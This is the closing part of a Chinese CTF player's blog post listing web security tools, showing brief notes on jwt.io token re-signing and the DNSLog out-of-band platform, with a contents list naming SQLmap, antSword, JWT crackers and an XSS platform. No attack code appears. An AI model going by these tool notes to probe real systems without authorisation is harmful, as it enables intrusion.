<li><strong>加密解密</strong>：AES、DES、RSA、SM2/3/4（国密）等对称/非对称加密在线计算。</li>
<li><strong>正则测试</strong>：实时匹配高亮，支持常用正则模板。</li>
<li><strong>时间戳转换</strong>：Unix 时间戳与日期互转。</li>
</ul>
<h2 id="json-web-tokens-jwtio"><a class="markdownIt-Anchor" href="#json-web-tokens-jwtio"></a> <a target="_blank" rel="noopener" href="https://www.jwt.io/">JSON Web Tokens - jwt.io</a></h2>
<p><strong>核心功能</strong>：</p>
<ul>
<li><strong>令牌解析</strong>：粘贴 JWT 自动解码 Header、Payload、Signature 三部分。</li>
<li><strong>签名验证</strong>：输入密钥可验证签名是否有效，支持 HS256/RS256 等主流算法。</li>
<li><strong>令牌生成</strong>：修改 Payload 后自动生成新令牌（需已知密钥）。</li>
<li><strong>库文档</strong>：提供各语言 JWT 库的官方文档链接。</li>
</ul>
<h2 id="dnslog-platform"><a class="markdownIt-Anchor" href="#dnslog-platform"></a> <a target="_blank" rel="noopener" href="http://www.dnslog.cn/">DNSLog Platform</a></h2>
<p>这是一个DNS 日志接收平台，专门用于验证<strong>无回显</strong>的安全漏洞。</p>
<h1 id="未完待续"><a class="markdownIt-Anchor" href="#未完待续"></a> 未完待续 …</h1>

    </div>
    <footer class="article-footer">
        <a class="article-category-link" href="/categories/%E7%AC%94%E8%AE%B0/" title="笔记" data-aos="zoom-in">笔记</a>

        <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/web/" rel="tag" title="web">web</a></li></ul>

    </footer>
  </div>
    <nav id="article-nav" aria-label="Article navigation" data-aos="fade-up">
      <div class="article-nav-link-wrap left">
          <img data-src="/images/covers/02.jpg" data-sizes="auto" alt="LitCTF2025" class="lazyload">
        <a href="/2026/05/29/LitCTF2025/" aria-label="前一篇: LitCTF2025" title="前一篇: LitCTF2025"></a>
        <div class="article-nav-caption">前一篇</div>
        <h3 class="article-nav-title">
            LitCTF2025
        </h3>
      </div>
    <div class="article-nav-link-wrap right">
        <img data-src="/images/covers/07.jpg" data-sizes="auto" alt="LitCTF2026" class="lazyload">
      <a href="/2026/05/25/LitCTF2026/" aria-label="后一篇: LitCTF2026"  title="后一篇: LitCTF2026"></a>
      <div class="article-nav-caption">后一篇</div>
      <h3 class="article-nav-title">
          LitCTF2026
      </h3>
    </div>
  </nav>

</article>


</section>
        </div>
        <footer id="footer" aria-label="Site footer">
  <div style="width: 100%; overflow: hidden">
    <div class="footer-line"></div>
  </div>
  <div id="footer-info">
    <div>
      <span class="icon-copyright"></span>
        2026
        <span class="footer-info-sep rotate"></span>
      Ether
    </div>
      <div>
        基于&nbsp;<a href="https://hexo.io/" rel="noopener nofollow noreferrer" target="_blank">Hexo</a>&nbsp;
        Theme.<a href="https://github.com/D-Sketon/hexo-theme-reimu" rel="noopener nofollow noreferrer" target="_blank">Reimu</a>
      </div>
      <div>
        <span class="icon-brush"></span>
        19.2k
        &nbsp;|&nbsp;
        <span class="icon-coffee"></span>
        01:26
      </div>
      <div>
        <span class="icon-eye"></span>
        <span id="busuanzi_container_site_pv">总访问量&nbsp;<span id="busuanzi_value_site_pv"></span></span>
        &nbsp;|&nbsp;
        <span class="icon-user"></span>
        <span id="busuanzi_container_site_uv">总访客量&nbsp;<span id="busuanzi_value_site_uv"></span></span>
      </div>
  </div>
</footer>

          <div class="sidebar-top">
            <div class="sidebar-top-taichi rotate"></div>
            <div class="arrow-up"></div>
          </div>
        <div id="mask" class="hide"></div>
      </div>
      <nav id="mobile-nav" aria-label="Mobile navigation">
  <div class="sidebar-wrap">
        <div class="sidebar-toc-sidebar"><h3 class="toc-title">文章目录</h3>
<div class="sidebar-toc-wrapper toc-div-class" >
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#burp-suite"><span class="toc-number">1.</span> <span class="toc-text"> Burp Suite</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#switchyomega"><span class="toc-number">2.</span> <span class="toc-text"> SwitchyOmega</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#hackbar"><span class="toc-number">3.</span> <span class="toc-text"> Hackbar</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#dirsearch"><span class="toc-number">4.</span> <span class="toc-text"> dirsearch</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#githacker-main"><span class="toc-number">5.</span> <span class="toc-text"> GitHacker-main</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#cpolar"><span class="toc-number">6.</span> <span class="toc-text"> cpolar</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#jwt"><span class="toc-number">7.</span> <span class="toc-text"> JWT</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#c-jwt-cracker"><span class="toc-number">7.1.</span> <span class="toc-text"> c-jwt-cracker</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#jwt_tool"><span class="toc-number">7.2.</span> <span class="toc-text"> jwt_tool</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#antsword"><span class="toc-number">8.</span> <span class="toc-text"> antSword</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#sqlmap"><span class="toc-number">9.</span> <span class="toc-text"> SQLmap</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#docker"><span class="toc-number">10.</span> <span class="toc-text"> Docker</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#phpstudy_64"><span class="toc-number">11.</span> <span class="toc-text"> phpStudy_64</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B3%E4%BA%8Emd5"><span class="toc-number">12.</span> <span class="toc-text"> 关于MD5</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#hash-ext-attack-master"><span class="toc-number">12.1.</span> <span class="toc-text"> hash-ext-attack-master</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#fastcoll"><span class="toc-number">12.2.</span> <span class="toc-text"> fastcoll</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#md5%E8%A7%A3%E5%AF%86"><span class="toc-number">12.3.</span> <span class="toc-text"> md5解密</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#vmware"><span class="toc-number">13.</span> <span class="toc-text"> VMware</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%9A%8F%E6%B3%A2%E9%80%90%E6%B5%81"><span class="toc-number">14.</span> <span class="toc-text"> 随波逐流</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#bluelotus"><span class="toc-number">15.</span> <span class="toc-text"> Bluelotus</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%80%E5%90%8E%E8%B4%B4%E5%87%A0%E4%B8%AA%E6%88%91%E5%B8%B8%E7%94%A8%E7%9A%84%E7%BD%91%E7%AB%99"><span class="toc-number">16.</span> <span class="toc-text"> 最后贴几个我常用的网站</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%94%A4%E5%AD%90%E5%9C%A8%E7%BA%BF%E5%B7%A5%E5%85%B7%E7%BD%91-%E9%A6%96%E9%A1%B5"><span class="toc-number">16.1.</span> <span class="toc-text"> 锤子在线工具网 - 首页</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#json%E5%9C%A8%E7%BA%BF-json%E8%A7%A3%E6%9E%90%E6%A0%BC%E5%BC%8F%E5%8C%96so-json%E5%9C%A8%E7%BA%BF%E5%B7%A5%E5%85%B7"><span class="toc-number">16.2.</span> <span class="toc-text"> JSON在线 | JSON解析格式化—SO JSON在线工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#json-web-tokens-jwtio"><span class="toc-number">16.3.</span> <span class="toc-text"> JSON Web Tokens - jwt.io</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#dnslog-platform"><span class="toc-number">16.4.</span> <span class="toc-text"> DNSLog Platform</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%9C%AA%E5%AE%8C%E5%BE%85%E7%BB%AD"><span class="toc-number">17.</span> <span class="toc-text"> 未完待续 …</span></a></li></ol>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.jpg" data-sizes="auto" alt="Ether" class="lazyload">
  <div class="sidebar-author-name">Ether</div>
  <div class="sidebar-description">求索本身即是归路</div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>文章</div>
    <div class="sidebar-state-number">6</div>
  </div>
  <div class="sidebar-state-category">
    <div>分类</div>
    <div class="sidebar-state-number">2</div>
  </div>
  <div class="sidebar-state-tag">
    <div>标签</div>
    <div class="sidebar-state-number">4</div>
  </div>
</div>
<div class="sidebar-social" >
    <div class="icon-email sidebar-social-icon">
      <a href=2930289360@qq.com itemprop="url" target="_blank" aria-label="email" rel="noopener nofollow noreferrer"></a>
    </div>
    <div class="icon-github sidebar-social-icon">
      <a href=https://github.com/yourname itemprop="url" target="_blank" aria-label="github" rel="noopener nofollow noreferrer"></a>
    </div>
</div>
<div class="sidebar-menu">
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/" aria-label="首页"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">首页</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/blog/archives" aria-label="归档"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">归档</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/blog/about" aria-label="关于"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">关于</div>
      </div>
      <div class="sidebar-menu-link-wrap">
        <a class="sidebar-menu-link-dummy" href="/blog/friends" aria-label="友链"></a>
          <div class="sidebar-menu-icon icon ">
                
          </div>
        <div class="sidebar-menu-link">友链</div>
      </div>
</div>
</div>
  </div>
      <div class="sidebar-btn-wrapper">
        <div class="sidebar-toc-btn current"></div>
        <div class="sidebar-common-btn"></div>
      </div>
</nav>

    </div>
      <div class="site-search">
        <div class="reimu-popup popup">
          <div class="reimu-search">
            <div class="reimu-search-input-icon"></div>
            <div id="reimu-search-input"></div>
            <div class="popup-btn-close"></div>
          </div>
          <div class="reimu-results">
            <div id="reimu-stats"></div>
            <div id="reimu-hits"></div>
            <div id="reimu-pagination" class="reimu-pagination"></div>
          </div>
          <img class="reimu-bg" src="/images/reimu.png" loading="lazy" decoding="async" fetchpriority="low"/>
        </div>
      </div>
    
<script src="https://npm.webcache.cn/lazysizes@5.3.2/lazysizes.min.js" integrity="sha384-3gT&#x2F;vsepWkfz&#x2F;ff7PpWNUeMzeWoH3cDhm&#x2F;A8jM7ouoAK0&#x2F;fP&#x2F;9bcHHR5kHq2nf+e" crossorigin="anonymous"></script>


<script src="https://npm.webcache.cn/clipboard@2.0.11/dist/clipboard.min.js" integrity="sha384-J08i8An&#x2F;QeARD9ExYpvphB8BsyOj3Gh2TSh1aLINKO3L0cMSH2dN3E22zFoXEi0Q" crossorigin="anonymous"></script>




<script src="/js/script.js"></script>


  
<script src="/js/aos.js"></script>

  <script>
    var aosInit = () => {
      AOS.init({
        duration: 1000,
        easing: "ease",
        once: true,
        offset: 50,
      });
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', aosInit);
    } else {
      aosInit();
    }
  </script>


<script src="/js/pjax_script.js" data-pjax></script>



  <script>
    var ALGOLIA_CONFIG = {
      logo: "/images/algolia_logo.svg",
      algolia: {
        applicationID: "${ALGOLIA_APP_ID}",
        apiKey: "${ALGOLIA_SEARCH_KEY}",
        indexName: "${ALGOLIA_INDEX_NAME}",
        hits: {
          "per_page": parseInt("10")
        },
        labels: {
          "input_placeholder": "搜索.....",
          "hits_empty": "未发现与 「${query}」相关内容",
          "hits_stats": "找到${hits}条结果（用时 ${time} ms）"
        }
      }
    };
  </script>
  
<script src="https://npm.webcache.cn/algoliasearch@4.17.1/dist/algoliasearch-lite.umd.js" integrity="sha384-xvLS0jfKuoREs7pqkRI&#x2F;OI8GcqohO5S+jQz7ZBtQXnsXmD+9jDOOY4cL6dCPzlrk" crossorigin="anonymous" defer></script>

  
<script src="https://npm.webcache.cn/@reimujs/instantsearch.js@4.57.0-beta.1/dist/instantsearch.production.min.js" integrity="sha384-aagKMe8nkqaP2DYQc8kkYOL5l+M5Q2WH&#x2F;Uhr4teOh0Ybp0RZj0kUSDm45qPikMjK" crossorigin="anonymous" defer></script>

  
<script src="/js/algolia_search.js" defer></script>


  <script>
    var setupFirework = () => {
      if (!false || !window.matchMedia('(max-width: 768px)').matches) {
        window.firework && window.firework(JSON.parse('{"excludeElements":["a","button"],"particles":[{"shape":"circle","move":["emit"],"easing":"easeOutExpo","colors":["var(--red-1)","var(--red-2)","var(--red-3)","var(--red-4)"],"number":20,"duration":[1200,1800],"shapeOptions":{"radius":[16,32],"alpha":[0.3,0.5]}},{"shape":"circle","move":["diffuse"],"easing":"easeOutExpo","colors":["var(--red-0)"],"number":1,"duration":[1200,1800],"shapeOptions":{"radius":20,"alpha":[0.2,0.5],"lineWidth":6}}]}'));
      }
    }
  </script>
  
<script src="https://npm.webcache.cn/mouse-firework@0.2.0/dist/index.umd.js" integrity="sha384-qi9WggRt19tv8Vc7pCHW3ulMNLwrn515zaLEWZjl1px07vz8+pUoWX8n1rgq282T" crossorigin="anonymous" onload="setupFirework()" defer></script>






<div id="lazy-script">
  <div>
      
      
      <script data-pjax>
        window.REIMU_POST = {
          author: "Ether",
          title: "工具使用",
          url: "http://ether-lin.cn/2026/05/28/%E5%B7%A5%E5%85%B7%E4%BD%BF%E7%94%A8/",
          excerpt: "",
          description: "",
          stripContent: "本文的作用是使 Ether 小姐更加熟悉她电脑上的工具，嘻嘻  Burp Suite 当当当当！首先就是伟大的 bp啦，功能非常之强大 安全工具 | BurpSuite安装使用（保姆级教程！)-CSDN博客 可以抓包改包、爆破、数据外带等等  SwitchyOmega 一个浏览器，主要用来配合 Burp Suite使用，使 bp 只代理浏览器而不影响系统  Hackbar 这也是一个浏览器插件，主要用于发包到网页  dirsearch 轻量级目录爆破工具，支持多线程、自定义字典、状态码过滤，常用",
          date: "Thu May 28 2026 11:26:28 GMT+0800",
          updated: "Fri May 29 2026 00:05:56 GMT+0800",
          cover: "/images/covers/12.jpg",
        };
      </script>
        
<script src="/js/insert_highlight.js" data-pjax></script>

      
<script src="/js/tabs.js" data-pjax defer></script>

      <script type="module" data-pjax>
        (async () => {
          const PhotoSwipeLightbox = (await safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe-lightbox.esm.min.js", "sha384-DiL6M/gG+wmTxmCRZyD1zee6lIhawn5TGvED0FOh7fXcN9B0aZ9dexSF/N6lrZi/")).default;
          const initPswp = (gallery, children) => {
            if (_$$(`${gallery} ${children}`).length > 0) {
              new PhotoSwipeLightbox({
                gallery,
                children,
                pswpModule: () => safeImport("https://npm.webcache.cn/photoswipe@5.4.4/dist/photoswipe.esm.min.js", "sha384-WkkO3GCmgkC3VQWpaV8DqhKJqpzpF9JoByxDmnV8+oTJ7m3DfYEWX1fu1scuS4+s")
              }).init();
            }
          }
          const pswp = () => {
            initPswp('.article-entry', 'a.article-gallery-item');
            initPswp('.article-gallery', 'a.article-gallery-item');
          }
          pswp();
        })();
      </script>
        


  </div>
</div>


  <script>
    console.log(String.raw`%c 
 ______     ______     __     __    __     __  __    
/\  == \   /\  ___\   /\ \   /\ "-./  \   /\ \/\ \   
\ \  __<   \ \  __\   \ \ \  \ \ \-./\ \  \ \ \_\ \  
 \ \_\ \_\  \ \_____\  \ \_\  \ \_\ \ \_\  \ \_____\ 
  \/_/ /_/   \/_____/   \/_/   \/_/  \/_/   \/_____/ 
                                                  
`,'color: #ff5252;')
    console.log('%c Theme.Reimu v' + '1.12.5' + ' %c https://github.com/D-Sketon/hexo-theme-reimu ', 'color: white; background: #ff5252; padding:5px 0;', 'padding:4px;border:1px solid #ff5252;')
  </script>
  


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" integrity="sha384-0M75wtSkhjIInv4coYlaJU83+OypaRCIq2SukQVQX04eGTCBXJDuWAbJet56id+S" crossorigin="anonymous" async></script>


<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

    
<script src="https://npm.webcache.cn/katex@0.16.24/dist/katex.min.js" integrity="sha384-MWNUH0WmtsYGhn2cbH6ELRCbf9LG3QDqCC+gqPB3IBNO35xjZK3Ejb6oONRpDbPg" crossorigin="anonymous" defer data-pjax></script>

    
<script src="https://npm.webcache.cn/katex@0.16.24/dist/contrib/auto-render.min.js" integrity="sha384-hCXGrW6PitJEwbkoStFjeJxv+fSOOQKOPbJxSfM6G5sWZjAyWhXiTIIAmQqnlLlh" crossorigin="anonymous" defer onload="renderMathInElement(_$(&#39;article&#39;), {delimiters: [{left: &#39;$$&#39;, right: &#39;$$&#39;, display: true},{left: &#39;$&#39;, right: &#39;$&#39;, display: false}]});" data-pjax></script>

  


  </body>
  </html>
